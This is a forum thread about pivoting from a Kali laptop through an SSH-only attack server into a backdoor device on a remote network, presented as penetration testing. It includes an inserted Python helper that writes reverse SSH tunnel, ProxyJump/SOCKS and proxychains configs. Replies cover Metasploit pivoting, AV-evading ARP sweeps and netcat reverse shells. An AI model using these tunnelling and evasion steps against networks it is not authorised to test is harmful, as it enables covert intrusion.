catesby Posted January 6, 2014

Hello everyone. For all those guys and gals who are longtime members, sorry, another pivoting help request. I have tried quite a few things now, read lots, watched videos, spoken to like-minded people and I still can't get my head round this particular problem. All help would be much appreciated. I have a deadline of Thursday night to get to grips with this and get it working...

Scenario: I have a backdoor device (bdd) sitting on a remote network, for ease of this post 111.111.111.1. The bdd is connected to an attack server via a reverse SSH tunnel, say myAttackServer.com. The attack server is pretty much on lockdown and there is no access to any tools on the server; however, SSH is allowed.

Goal: using my laptop installed with Kali Linux, my goal is to pen-test the 111.111.111.1 network by running the programs on my laptop, through myAttackServer.com and into the bdd.

"laptop - nmap" >> myAttackServer.com >> "bdd - 111.111.111.1"

I have proxychains installed. I have totally confused myself. Please please help me. Many thanks.
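The three hops in the question have to agree on two ports: the loopback port the bdd's reverse tunnel opens on the attack server, and the SOCKS port the laptop hands to proxychains. The following is an added illustration, not code from the thread; the user names, reverse-tunnel port 2222 and SOCKS port 1080 are assumptions, and the configs are generated and cross-checked so a mismatch is caught before anything is run.

```python
"""Compose and cross-check the laptop -> myAttackServer.com -> bdd SSH pivot."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Pivot:
    # Constructed values: only 111.111.111.x and myAttackServer.com come from the thread.
    attack_server: str = "myAttackServer.com"  # locked-down jump host, SSH only
    attack_user: str = "user"                  # assumed account on the jump host
    bdd_user: str = "bdd"                      # assumed account on the backdoor device
    reverse_port: int = 2222                   # loopback port on the attack server bound by ssh -R
    socks_port: int = 1080                     # laptop-side SOCKS port that proxychains uses


def bdd_reverse_tunnel(p: Pivot) -> str:
    # Run on the bdd: publish its own sshd (port 22) as 127.0.0.1:reverse_port on the
    # attack server. Binding to 127.0.0.1 keeps the forwarded port off external interfaces.
    return (f"ssh -N -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 "
            f"-R 127.0.0.1:{p.reverse_port}:localhost:22 {p.attack_user}@{p.attack_server}")


def laptop_ssh_config(p: Pivot) -> str:
    # ~/.ssh/config on the laptop: 'ssh bdd' jumps via the attack server to the loopback
    # port the reverse tunnel opened, and opens a local SOCKS proxy for proxychains.
    return "\n".join([
        "Host jump",
        f"    HostName {p.attack_server}",
        f"    User {p.attack_user}",
        "",
        "Host bdd",
        "    HostName 127.0.0.1",          # resolved on the jump host, not the laptop
        f"    Port {p.reverse_port}",
        f"    User {p.bdd_user}",
        "    ProxyJump jump",
        f"    DynamicForward 127.0.0.1:{p.socks_port}",
    ])


def proxychains_conf(p: Pivot) -> str:
    # proxychains.conf: TCP connections from laptop tools enter the SOCKS port, exit at the bdd.
    return f"strict_chain\nproxy_dns\n[ProxyList]\nsocks5 127.0.0.1 {p.socks_port}\n"


def check_chain(ssh_config: str, proxychains: str) -> list:
    """Return a list of mismatches between the two configs (empty when they agree)."""
    problems = []
    dyn = [l.split()[-1] for l in ssh_config.splitlines() if l.strip().startswith("DynamicForward")]
    socks = [l.split()[-1] for l in proxychains.splitlines() if l.startswith("socks")]
    if not dyn or not socks or dyn[0].split(":")[-1] != socks[0]:
        problems.append("proxychains SOCKS port does not match DynamicForward")
    if "ProxyJump" not in ssh_config:
        problems.append("pivot Host entry lacks ProxyJump; laptop would dial 127.0.0.1 locally")
    return problems
```

Only TCP connections pass through a SOCKS proxy, so scanners run under proxychains must use connect-style scans and skip ICMP host discovery; anything relying on raw packets silently bypasses the tunnel.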
digip Posted January 7, 2014

It is sometimes possible to nmap scan through a session using Metasploit in post exploitation, even with Armitage helping to automate it and see in a GUI interface what nodes are connected and then pivot to them, but you could also stay under the radar a bit on the remote machine, if all you have is SSH into it at this point, by writing a manual script to ARP sweep the network for other nodes to try and then scan. If Windows, a simple bat script; if Linux, a shell script. Just ping the range of IPs one at a time and every so often run arp, to check and log their MAC address to IP address. Then check the log for what it's found. Even machines ignoring a ping will return an ARP if they are alive on the network, which is one way to find nodes on a network without having to try and copy over something like nmap onto the compromised host, which might get picked up by AV software or such. Then from there, if you have your target machines, figure out how to scan them for services. If using Metasploit though, you should be able to use an encrypted tunnel to the reverse shell machine and scan the inner network through the session using post exploitation modules.

Places that may help: http://www.offensive-security.com/metasploit-unleashed/Pivoting, SecurityTube, and YouTube videos.
kerpap Posted January 15, 2014

Does your backdoor device support VPN? Meaning, could you configure an IPsec tunnel to your attackserver.com server, or a router to the bdd VPN? I see, potentially, if this is possible, you could get a router and configure a VPN to the bdd. If you can do a little on-site packet sniffing you might enumerate what routing protocol is running, most likely OSPF, and you might be able to add the router to the OSPF area, which would be really cool because the router would have the whole network topology on it, as OSPF is a link-state routing protocol.
ksecurity Posted January 31, 2014

Hey Catesby, a popular option (if available to you) is to install Kali on your attack server, SSH right into it, Bob's your uncle. Some fun stuff you can do with netcat (or even ncat with --allow and --ssl flags) to forward or reverse the shell of the attack server right to your laptop. Might make the routing easier on you if you move the attacking OS onto the server. Can still keep Kali on the laptop.